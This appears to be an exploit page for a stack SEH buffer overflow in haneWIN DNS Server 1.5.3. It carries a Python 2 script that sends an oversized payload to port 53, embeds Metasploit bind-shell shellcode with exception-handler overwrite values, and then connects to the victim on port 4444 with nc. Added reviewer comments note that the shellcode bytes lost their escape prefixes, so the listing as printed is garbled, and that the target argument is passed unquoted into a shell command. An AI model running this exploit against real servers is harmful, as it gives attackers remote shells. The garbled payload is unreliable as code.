
haneWIN DNS Server 1.5.3 Buffer Overflow

Posted on 31 January 2014

#!/usr/bin/python
# Exploit Title: haneWIN DNS Server (SEH)
# Author: Dario Estrada (dash) https://intrusionlabs.org
# Date: 2014-01-29
# Version: haneWIN DNS Server 1.5.3
# Vendor Homepage: http://www.hanewin.net/
# Vulnerable app link:http://www.hanewin.net/dns-e.htm
# Tested on: Windows XP SP3
# Thanks to God, to my family and all my friends for always being there
#
# Description:
# A SEH overflow occurs when large amount of data is sent to the server
#
# Reader's notes (added on review):
# - Python 2 script (print statements, str payloads); it does not run
#   under Python 3 as written.
# - The byte-string literals below appear to have lost their escape
#   prefixes in page extraction: as printed they are plain ASCII text,
#   so their lengths do not match the 4/4/5-byte sizes the layout
#   assumes. Treat this listing as a record of the technique, not a
#   faithful copy of the original file.
# - What a defender observes: one TCP connection to port 53 carrying a
#   single oversized send (about 2.9 KB as laid out below), then a
#   connection from the same client to port 4444. Remediation is the
#   vendor's fixed release; SEH-overwrite mitigations (SafeSEH, SEHOP,
#   DEP) reduce exploitability where available -- not verified against
#   this binary from here.
import socket, sys, os, time
# Print usage and stop when no target host was supplied.
usage = " Usage: " + sys.argv[0] + " <host> "
if len(sys.argv) < 2:
    print usage
    sys.exit(0)
host = sys.argv[1]
# Payload body. Per the author's comment it is a Metasploit bind shell;
# the nc call at the bottom assumes it listens on port 4444.
shellcode = (
#msfpayload windows/shell_bind_tcp R | msfencode -t c -b 'x00xffx0ax0d'
"xb8xdfx64x04x29xd9xc7xd9x74x24xf4x5dx29xc9xb1"
"x56x31x45x13x83xedxfcx03x45xd0x86xf1xd5x06xcf"
"xfax25xd6xb0x73xc0xe7xe2xe0x80x55x33x62xc4x55"
"xb8x26xfdxeexccxeexf2x47x7axc9x3dx58x4axd5x92"
"x9axccxa9xe8xcex2ex93x22x03x2exd4x5fxebx62x8d"
"x14x59x93xbax69x61x92x6cxe6xd9xecx09x39xadx46"
"x13x6ax1dxdcx5bx92x16xbax7bxa3xfbxd8x40xeax70"
"x2ax32xedx50x62xbbxdfx9cx29x82xefx11x33xc2xc8"
"xc9x46x38x2bx74x51xfbx51xa2xd4x1exf1x21x4exfb"
"x03xe6x09x88x08x43x5dxd6x0cx52xb2x6cx28xdfx35"
"xa3xb8x9bx11x67xe0x78x3bx3ex4cx2fx44x20x28x90"
"xe0x2axdbxc5x93x70xb4x2axaex8ax44x24xb9xf9x76"
"xebx11x96x3ax64xbcx61x3cx5fx78xfdxc3x5fx79xd7"
"x07x0bx29x4fxa1x33xa2x8fx4exe6x65xc0xe0x58xc6"
"xb0x40x08xaexdax4ex77xcexe4x84x0exc8x2axfcx43"
"xbfx4ex02x72x63xc6xe4x1ex8bx8exbfxb6x69xf5x77"
"x21x91xdfx2bxfax05x57x22x3cx29x68x60x6fx86xc0"
"xe3xfbxc4xd4x12xfcxc0x7cx5cxc5x83xf7x30x84x32"
"x07x19x7exd6x9axc6x7ex91x86x50x29xf6x79xa9xbf"
"xeax20x03xddxf6xb5x6cx65x2dx06x72x64xa0x32x50"
"x76x7cxbaxdcx22xd0xedx8ax9cx96x47x7dx76x41x3b"
"xd7x1ex14x77xe8x58x19x52x9ex84xa8x0bxe7xbbx05"
"xdcxefxc4x7bx7cx0fx1fx38x8cx5ax3dx69x05x03xd4"
"x2bx48xb4x03x6fx75x37xa1x10x82x27xc0x15xcexef"
"x39x64x5fx9ax3dxdbx60x8f"
)
# The three short strings the author names nSEH / SEH / opcode are placed
# right after the first 2324 bytes; by their names they are presumably the
# next-pointer and handler slots of the exception record plus a trailing
# instruction. The values are the author's, fixed for 1.5.3 on XP SP3
# (see header) -- nothing on this page lets them be re-derived.
nSEH = 'xebx06x90x90'
SEH = 'xd1x07xfcx7f'
opcode = "xe9xdfxf6xffxff"
# Filler so that shellcode + junk is exactly 2324 bytes; the layout
# therefore assumes the overwritten record sits at that offset into the
# received data.
junk = 'A' * (2324 - len(shellcode))
padding = 'A' * 600
buff = shellcode + junk + nSEH + SEH + opcode + padding
print "[+] Connecting to %s:53" % (host)
try:
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((host, 53))
    # aix is built but never used; buff (above) is what gets sent.
    aix= shellcode + 'A' * (2324 - len(shellcode))
    print "[*] Sending payload.." + " shellcode: " + str(len(shellcode))
    # Single send(); the return value is not checked, so a short write
    # (send() may deliver fewer bytes than len(buff)) goes unnoticed.
    s.send(buff)
    print "[*] Exploit Sent Successfully!"
    s.close()
    print "[+] Waiting for 5 sec before spawning shell to " + host + ":4444 "
    time.sleep(5)
    # host comes straight from argv and is interpolated into a shell
    # command unquoted, so the argument is interpreted by the shell.
    os.system ("nc -n " + host + " 4444")
except:
    # Bare except: any failure in the block above -- including a failed
    # send() or a KeyboardInterrupt during the sleep -- is reported as a
    # connection failure.
    print "[!] Could not connect to " + host + ":53 "
    sys.exit(0)

 
